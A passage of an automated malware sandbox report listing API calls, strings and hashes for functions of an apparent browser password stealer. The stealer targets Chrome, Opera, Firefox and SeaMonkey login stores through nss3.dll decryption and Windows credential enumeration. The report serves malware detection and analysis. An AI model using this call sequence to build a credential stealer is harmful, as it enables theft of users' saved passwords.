                                                                                                    • Opcode ID: 7bf2893a727a8b250936425436c2602b2102234e3c58862608b198b8383da292
                                                                                                    • Instruction ID: 5387a3ffe087b7673ef104c15d829f3f0df010b9e50aa15a0af8b6122c5a167a
                                                                                                    • Opcode Fuzzy Hash: 7bf2893a727a8b250936425436c2602b2102234e3c58862608b198b8383da292
                                                                                                    • Instruction Fuzzy Hash: A0C04031544301FAC5114F909F05E4D7F516B54B40F118415B24450065C1E54574DB26
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004084CE, Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1860491036-0
                                                                                                    • Opcode ID: 8558853bd0ccca55316a6e62ce26709ec46b41dce932cf1f4299bcce20d03e94
                                                                                                    • Instruction ID: 33d46294e57da76ea2c08804649fae6184d1477937e8cd9eb119e1572679ad16
                                                                                                    • Opcode Fuzzy Hash: 8558853bd0ccca55316a6e62ce26709ec46b41dce932cf1f4299bcce20d03e94
                                                                                                    • Instruction Fuzzy Hash: F321B3B0A01300AED7518F2B9945955FBE4FF94355B2AC8AFD149DB2B2EBB8C8408F14
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406A74, Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • strlen.MSVCRT ref: 00406A80
                                                                                                    • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AA0
                                                                                                      • Part of subcall function 004060FA: malloc.MSVCRT ref: 00406116
                                                                                                      • Part of subcall function 004060FA: memcpy.MSVCRT ref: 0040612E
                                                                                                      • Part of subcall function 004060FA: free.MSVCRT(00000000,00000000,76020A60,00406B49,00000001,?,00000000,76020A60,00406D88,00000000,?,?), ref: 00406137
                                                                                                    • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AC3
                                                                                                    • memcpy.MSVCRT ref: 00406AE3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: free$memcpy$mallocstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3669619086-0
                                                                                                    • Opcode ID: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                                                                    • Instruction ID: e46d755c35f7a0493bef025674ad9543d325b8c94dab604409744cdcda2aebf9
                                                                                                    • Opcode Fuzzy Hash: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                                                                    • Instruction Fuzzy Hash: 70116D71200700EFC730EF18D8819AAB7F5EF45328B108A2EF957A7691DB35F9658B54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040787D, Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 1033339047-0
                                                                                                    • Opcode ID: 9ab9be69dc2bd5448cfbf4b4b1623e379508e5426f19009ac8e70b3886595ce5
                                                                                                    • Instruction ID: 98653883aa4781a1616f5f21c4e99a92f1a36013e955d8e4b32a99e29624f39b
                                                                                                    • Opcode Fuzzy Hash: 9ab9be69dc2bd5448cfbf4b4b1623e379508e5426f19009ac8e70b3886595ce5
                                                                                                    • Instruction Fuzzy Hash: E6F012B1589210BFDB549B39ED067A53AB2A748394F10917EE207CA6F5FB7454408B4C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Analysis Process: iexplore.exe PID: 2448 Parent PID: 1736 iexplore.exeCOMMON

                                                                                                    Executed Functions

                                                                                                    Function 00408B60, Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 234filenativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00408B88
                                                                                                      • Part of subcall function 00407845: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040B282,00000000,0040B135,?,00000000,00000208,?), ref: 00407850
                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 00408BAF
                                                                                                      • Part of subcall function 004088FC: ??2@YAPAXI@Z.MSVCRT ref: 00408905
                                                                                                      • Part of subcall function 0041046C: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,00408BDD,?,000000FF,00000000,00000104), ref: 0041047F
                                                                                                      • Part of subcall function 0041046C: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00410496
                                                                                                      • Part of subcall function 0041046C: GetProcAddress.KERNEL32(NtLoadDriver), ref: 004104A8
                                                                                                      • Part of subcall function 0041046C: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 004104BA
                                                                                                      • Part of subcall function 0041046C: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 004104CC
                                                                                                      • Part of subcall function 0041046C: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004104DE
                                                                                                      • Part of subcall function 0041046C: GetProcAddress.KERNEL32(NtQueryObject), ref: 004104F0
                                                                                                      • Part of subcall function 0041046C: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 00410502
                                                                                                      • Part of subcall function 0041046C: GetProcAddress.KERNEL32(NtResumeProcess), ref: 00410514
                                                                                                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 00408BF0
                                                                                                    • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 00408C19
                                                                                                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 00408C24
                                                                                                    • _wcsicmp.MSVCRT ref: 00408CB5
                                                                                                    • _wcsicmp.MSVCRT ref: 00408CC8
                                                                                                    • _wcsicmp.MSVCRT ref: 00408CDB
                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,?,?,000000FF,00000000,00000104), ref: 00408CEF
                                                                                                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 00408D35
                                                                                                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 00408D44
                                                                                                    • memset.MSVCRT ref: 00408D62
                                                                                                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 00408D95
                                                                                                    • _wcsicmp.MSVCRT ref: 00408DB5
                                                                                                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 00408DF5
                                                                                                    • FreeLibrary.KERNELBASE(?,?,?,000000FF,00000000,00000104), ref: 00408E17
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindFreeInformationLibraryNameNotificationOpenQuerySystem
                                                                                                    • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                    • API String ID: 1954110673-3398334509
                                                                                                    • Opcode ID: 61900e50d4a7d45b503282ffe681e79dd6729fa48a5ddddf2531cf7a25dcb430
                                                                                                    • Instruction ID: 94d829638436af996ab25858985c68e38282c7a3b045b48f4adb6e3da833be68
                                                                                                    • Opcode Fuzzy Hash: 61900e50d4a7d45b503282ffe681e79dd6729fa48a5ddddf2531cf7a25dcb430
                                                                                                    • Instruction Fuzzy Hash: E19148B1D00218AFDB10EF95C985AAEBBB5FF14304F60407EE945B6291DB389E80DB58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00411A64, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 143processlibraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040892A: free.MSVCRT(00000000,0040ECEB,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 00408931
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411A84
                                                                                                    • memset.MSVCRT ref: 00411A99
                                                                                                    • Process32FirstW.KERNEL32(?,?), ref: 00411AB5
                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,00001000,?,00000000), ref: 00411AFA
                                                                                                    • memset.MSVCRT ref: 00411B21
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00411B56
                                                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00411B70
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00411BC2
                                                                                                    • free.MSVCRT(?), ref: 00411BDB
                                                                                                    • Process32NextW.KERNEL32(?,0000022C), ref: 00411C24
                                                                                                    • CloseHandle.KERNEL32(?,?,0000022C), ref: 00411C34
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                    • API String ID: 1344430650-1740548384
                                                                                                    • Opcode ID: e5182208dd10a9ff8ff11d979a9dc663eeb153de0f305b30892cb7f5fc41010b
                                                                                                    • Instruction ID: 585450180b7b271ee8a8c4c9b0c093e7d36674b65478966afb12f14dab0c2b10
                                                                                                    • Opcode Fuzzy Hash: e5182208dd10a9ff8ff11d979a9dc663eeb153de0f305b30892cb7f5fc41010b
                                                                                                    • Instruction Fuzzy Hash: AE519EB28402589BDB20DF65CC84ADEB7B9EF94304F10416BFA1993261EB759E84CF94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00408752, Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNELBASE(00000103,0000038B,00000000,?,00410FDD,?), ref: 00408768
                                                                                                    • FindNextFileW.KERNEL32(000000FF,0000038B,00000000,?,00410FDD,?), ref: 00408786
                                                                                                    • wcslen.MSVCRT ref: 004087B6
                                                                                                    • wcslen.MSVCRT ref: 004087BE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileFindwcslen$FirstNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 2163959949-0
                                                                                                    • Opcode ID: 3ddebd1ba96c20f293629fd939a5ac0427bd42147f021fe530743334ac5d6a48
                                                                                                    • Instruction ID: b03f5c2ed1960bbcba0ea1a18fafd23ae89a763934581ee6df97e929094fca65
                                                                                                    • Opcode Fuzzy Hash: 3ddebd1ba96c20f293629fd939a5ac0427bd42147f021fe530743334ac5d6a48
                                                                                                    • Instruction Fuzzy Hash: 27117CB64056019FD7249B64DD84A9BB3DCAB44769F704A3FF19AE31C0EB38A940C768
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00416857, Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041677F: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004167AB
                                                                                                      • Part of subcall function 0041677F: malloc.MSVCRT ref: 004167B6
                                                                                                      • Part of subcall function 0041677F: free.MSVCRT(?), ref: 004167C6
                                                                                                      • Part of subcall function 0041549A: GetVersionExW.KERNEL32(?), ref: 004154BD
                                                                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004168D1
                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004168F9
                                                                                                    • free.MSVCRT(00000000,?,00000000,?,00000000), ref: 00416902
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1355100292-0
                                                                                                    • Opcode ID: afdaf9d4fab5ca2fc4e3c9437634254963f6d1e71d1f6b4341e74a11f1708d10
                                                                                                    • Instruction ID: c6505658d8e9ca3739131927a998403e3686afe90ef8d0289b759e73b22967a4
                                                                                                    • Opcode Fuzzy Hash: afdaf9d4fab5ca2fc4e3c9437634254963f6d1e71d1f6b4341e74a11f1708d10
                                                                                                    • Instruction Fuzzy Hash: 07216576905118AFEB21BBA4CC44AEF7BBCEB05304F1600A7E641D7141E778CEC597A5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00416A80, Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00416A8B
                                                                                                    • GetSystemInfo.KERNELBASE(00452CE0,?,00000000,00441507,00000000,?,?,00000003,00000000,00000000), ref: 00416A94
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InfoSystemmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3558857096-0
                                                                                                    • Opcode ID: 9678110852b610099c649aff7f14d249c2c76aae6c7e8dc6b0bcd65fc19e349c
                                                                                                    • Instruction ID: 9ff26be56bc2ac4cb995cb78e9501395e44e9153de2a2f9b5cf9adfcefdce10e
                                                                                                    • Opcode Fuzzy Hash: 9678110852b610099c649aff7f14d249c2c76aae6c7e8dc6b0bcd65fc19e349c
                                                                                                    • Instruction Fuzzy Hash: 29E09B7290172017E251BB356D07B8F25499F8274AF054037FD0496253E76C8E4546DD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041094B, Relevance: 67.0, APIs: 27, Strings: 11, Instructions: 499COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004109BD
                                                                                                    • wcsrchr.MSVCRT ref: 004109D5
                                                                                                    • memset.MSVCRT ref: 00410ABC
                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Sea Monkey,00000000,00000104), ref: 00410B09
                                                                                                      • Part of subcall function 00409D5E: _wcslwr.MSVCRT ref: 00409E26
                                                                                                      • Part of subcall function 00409D5E: wcslen.MSVCRT ref: 00409E3B
                                                                                                      • Part of subcall function 00408943: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040897C
                                                                                                      • Part of subcall function 00408943: wcslen.MSVCRT ref: 004089A2
                                                                                                      • Part of subcall function 00408943: wcsncmp.MSVCRT(?,?,?,?,00000000,?), ref: 004089D8
                                                                                                      • Part of subcall function 00408943: memset.MSVCRT ref: 00408A4F
                                                                                                      • Part of subcall function 00408943: memcpy.MSVCRT ref: 00408A70
                                                                                                      • Part of subcall function 0040A1DC: LoadLibraryW.KERNELBASE(pstorec.dll,00000000,00410988,?,?,?,?,?,00403273,?), ref: 0040A1ED
                                                                                                      • Part of subcall function 0040A1DC: GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 0040A200
                                                                                                      • Part of subcall function 0040FAC9: memset.MSVCRT ref: 0040FAEC
                                                                                                      • Part of subcall function 0040FAC9: memset.MSVCRT ref: 0040FB01
                                                                                                      • Part of subcall function 0040FAC9: memset.MSVCRT ref: 0040FB16
                                                                                                      • Part of subcall function 0040FAC9: memset.MSVCRT ref: 0040FB2B
                                                                                                      • Part of subcall function 0040FAC9: memset.MSVCRT ref: 0040FB40
                                                                                                      • Part of subcall function 0040FAC9: wcslen.MSVCRT ref: 0040FB66
                                                                                                      • Part of subcall function 0040FAC9: wcslen.MSVCRT ref: 0040FB77
                                                                                                      • Part of subcall function 0040FAC9: wcslen.MSVCRT ref: 0040FBAF
                                                                                                      • Part of subcall function 0040FAC9: wcslen.MSVCRT ref: 0040FBBD
                                                                                                      • Part of subcall function 0040FAC9: wcslen.MSVCRT ref: 0040FBF6
                                                                                                      • Part of subcall function 0040FAC9: wcslen.MSVCRT ref: 0040FC04
                                                                                                    • memset.MSVCRT ref: 00410B98
                                                                                                    • memset.MSVCRT ref: 00410BB0
                                                                                                    • memset.MSVCRT ref: 00410BC8
                                                                                                    • wcslen.MSVCRT ref: 00410C22
                                                                                                    • wcslen.MSVCRT ref: 00410C31
                                                                                                    • wcslen.MSVCRT ref: 00410C76
                                                                                                    • wcslen.MSVCRT ref: 00410C85
                                                                                                    • memset.MSVCRT ref: 00410CE4
                                                                                                    • _wcsicmp.MSVCRT ref: 00410D49
                                                                                                      • Part of subcall function 00407025: memset.MSVCRT ref: 00407065
                                                                                                      • Part of subcall function 00407025: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 0040707E
                                                                                                      • Part of subcall function 00407025: memset.MSVCRT ref: 004070B7
                                                                                                      • Part of subcall function 00407025: memset.MSVCRT ref: 004070CF
                                                                                                      • Part of subcall function 00407025: memset.MSVCRT ref: 004070E7
                                                                                                      • Part of subcall function 00407025: memset.MSVCRT ref: 004070FF
                                                                                                      • Part of subcall function 00407025: memset.MSVCRT ref: 00407117
                                                                                                      • Part of subcall function 00407025: wcslen.MSVCRT ref: 00407122
                                                                                                      • Part of subcall function 00407025: wcslen.MSVCRT ref: 00407130
                                                                                                      • Part of subcall function 00407025: wcslen.MSVCRT ref: 0040715F
                                                                                                    • memset.MSVCRT ref: 00410D97
                                                                                                    • memset.MSVCRT ref: 00410DAF
                                                                                                    • memset.MSVCRT ref: 00410DC7
                                                                                                      • Part of subcall function 00412B44: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00412B7E
                                                                                                    • wcslen.MSVCRT ref: 00410DE0
                                                                                                    • wcslen.MSVCRT ref: 00410DEE
                                                                                                    • wcslen.MSVCRT ref: 00410E49
                                                                                                    • wcslen.MSVCRT ref: 00410E57
                                                                                                    • memset.MSVCRT ref: 00410ED7
                                                                                                    • wcslen.MSVCRT ref: 00410EE6
                                                                                                    • wcslen.MSVCRT ref: 00410EF4
                                                                                                      • Part of subcall function 004086AE: wcscmp.MSVCRT ref: 004086CD
                                                                                                      • Part of subcall function 004086AE: wcscmp.MSVCRT ref: 004086DE
                                                                                                    • wcslen.MSVCRT ref: 00410F6D
                                                                                                    • wcslen.MSVCRT ref: 00410F7B
                                                                                                    • wcslen.MSVCRT ref: 00410FF9
                                                                                                    • wcslen.MSVCRT ref: 00411007
                                                                                                      • Part of subcall function 00407974: wcscpy.MSVCRT ref: 0040797C
                                                                                                      • Part of subcall function 00407974: wcscat.MSVCRT ref: 0040798B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wcslen$memset$wcscmp$AddressByteCharCredEnumerateEnvironmentExpandFolderLibraryLoadMultiPathProcSpecialStringsWide_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmpwcsrchr
                                                                                                    • String ID: %programfiles%\Sea Monkey$Google\Chrome SxS\User Data$Google\Chrome\User Data$Login Data$Opera$Opera Software\Opera Stable\Login Data$Opera\Opera7\profile\wand.dat$Opera\Opera\wand.dat$Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe$wand.dat
                                                                                                    • API String ID: 3139056532-2290994522
                                                                                                    • Opcode ID: 0c0659075cdee384c029ece4a5913aefd801025b1d6eeeb79d1589e5a9921963
                                                                                                    • Instruction ID: 14fca25f14340febb7a4332741aa6290e278b5f6c7bb6b00635111bb539298fc
                                                                                                    • Opcode Fuzzy Hash: 0c0659075cdee384c029ece4a5913aefd801025b1d6eeeb79d1589e5a9921963
                                                                                                    • Instruction Fuzzy Hash: FE02B5729012189BDB20EB51CD85ADEB3B8BF04744F5441ABF508E7141EBB8AAC5CF5E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004102E2, Relevance: 42.1, APIs: 16, Strings: 8, Instructions: 124libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00410303
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 0041034C
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 00410359
                                                                                                    • memset.MSVCRT ref: 00410373
                                                                                                    • wcslen.MSVCRT ref: 00410380
                                                                                                    • wcslen.MSVCRT ref: 0041038F
                                                                                                    • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 004103CA
                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 004103E6
                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 004103FD
                                                                                                    • GetProcAddress.KERNEL32(?,NSS_Init), ref: 00410412
                                                                                                    • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0041041E
                                                                                                    • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0041042A
                                                                                                    • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410436
                                                                                                    • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 00410442
                                                                                                    • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0041044E
                                                                                                    • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0041045A
                                                                                                      • Part of subcall function 0040649E: memset.MSVCRT ref: 004064BF
                                                                                                      • Part of subcall function 0040649E: memset.MSVCRT ref: 0040650C
                                                                                                      • Part of subcall function 0040649E: RegCloseKey.ADVAPI32(0041031B), ref: 00406646
                                                                                                      • Part of subcall function 0040649E: wcscpy.MSVCRT ref: 00406654
                                                                                                      • Part of subcall function 0040649E: ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 0040666B
                                                                                                      • Part of subcall function 0040649E: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 004066A7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$memset$CurrentDirectory$LibraryLoadwcslen$CloseEnvironmentExpandHandleModuleStringswcscpy
                                                                                                    • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                                    • API String ID: 2554026968-4029219660
                                                                                                    • Opcode ID: eecc8a85060349fd41ee8b03032525dc17588d44c616f03ef8021aeb2ba6f295
                                                                                                    • Instruction ID: a2d31b7ad0cdacc97b750178b0e8a43fe927f68223924860bb62aedb9dd88b03
                                                                                                    • Opcode Fuzzy Hash: eecc8a85060349fd41ee8b03032525dc17588d44c616f03ef8021aeb2ba6f295
                                                                                                    • Instruction Fuzzy Hash: 6741A271940308ABDB20DF61CC85E9AB7F9FF68344F10496EF28593251E7B999C48B4D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407025, Relevance: 40.5, APIs: 18, Strings: 5, Instructions: 259COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004102E2: memset.MSVCRT ref: 00410303
                                                                                                      • Part of subcall function 004102E2: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 0041034C
                                                                                                      • Part of subcall function 004102E2: SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 00410359
                                                                                                      • Part of subcall function 004102E2: memset.MSVCRT ref: 00410373
                                                                                                      • Part of subcall function 004102E2: wcslen.MSVCRT ref: 00410380
                                                                                                      • Part of subcall function 004102E2: wcslen.MSVCRT ref: 0041038F
                                                                                                      • Part of subcall function 004102E2: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 004103CA
                                                                                                      • Part of subcall function 004102E2: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 004103E6
                                                                                                      • Part of subcall function 004102E2: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 004103FD
                                                                                                      • Part of subcall function 004102E2: GetProcAddress.KERNEL32(?,NSS_Init), ref: 00410412
                                                                                                      • Part of subcall function 004102E2: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0041041E
                                                                                                      • Part of subcall function 004102E2: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0041042A
                                                                                                      • Part of subcall function 004102E2: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410436
                                                                                                      • Part of subcall function 004102E2: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 00410442
                                                                                                    • memset.MSVCRT ref: 00407065
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 0040707E
                                                                                                    • memset.MSVCRT ref: 004070B7
                                                                                                    • memset.MSVCRT ref: 004070CF
                                                                                                    • memset.MSVCRT ref: 004070E7
                                                                                                    • memset.MSVCRT ref: 004070FF
                                                                                                    • memset.MSVCRT ref: 00407117
                                                                                                    • wcslen.MSVCRT ref: 00407122
                                                                                                    • wcslen.MSVCRT ref: 00407130
                                                                                                    • wcslen.MSVCRT ref: 0040715F
                                                                                                    • wcslen.MSVCRT ref: 0040716D
                                                                                                    • wcslen.MSVCRT ref: 0040719C
                                                                                                    • wcslen.MSVCRT ref: 004071AA
                                                                                                    • wcslen.MSVCRT ref: 004071D9
                                                                                                    • wcslen.MSVCRT ref: 004071E7
                                                                                                    • wcslen.MSVCRT ref: 00407216
                                                                                                    • wcslen.MSVCRT ref: 00407224
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0040733F
                                                                                                      • Part of subcall function 00407974: wcscpy.MSVCRT ref: 0040797C
                                                                                                      • Part of subcall function 00407974: wcscat.MSVCRT ref: 0040798B
                                                                                                      • Part of subcall function 00407813: GetFileAttributesW.KERNELBASE(?,0040B086,?,0040B13D,00000000,?,00000000,00000208,?), ref: 00407817
                                                                                                      • Part of subcall function 00406BCA: memset.MSVCRT ref: 00406C09
                                                                                                      • Part of subcall function 00406BCA: memset.MSVCRT ref: 00406C88
                                                                                                      • Part of subcall function 00406BCA: memset.MSVCRT ref: 00406C9D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wcslen$memset$AddressProc$CurrentDirectory$LibraryLoad$AttributesByteCharFileHandleModuleMultiWidewcscatwcscpy
                                                                                                    • String ID: logins.json$signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                                                                                    • API String ID: 3287676187-2852686199
                                                                                                    • Opcode ID: 23425df3a18b047ebd7c847e4d1a7d824014e7bae3e1903d799cbbec1fe01940
                                                                                                    • Instruction ID: 3bfa14f79ebe0a4ddd57479177be8565334f36f587025be7c499a5097770ee7f
                                                                                                    • Opcode Fuzzy Hash: 23425df3a18b047ebd7c847e4d1a7d824014e7bae3e1903d799cbbec1fe01940
                                                                                                    • Instruction Fuzzy Hash: E591D57280411AEBEB11EF91CC41ADE77B9FF04314F5405ABF908E2191E738AE54DB4A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040EAD4, Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 148COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00403914: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040EAE8,00000000), ref: 00403933
                                                                                                      • Part of subcall function 00403914: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403945
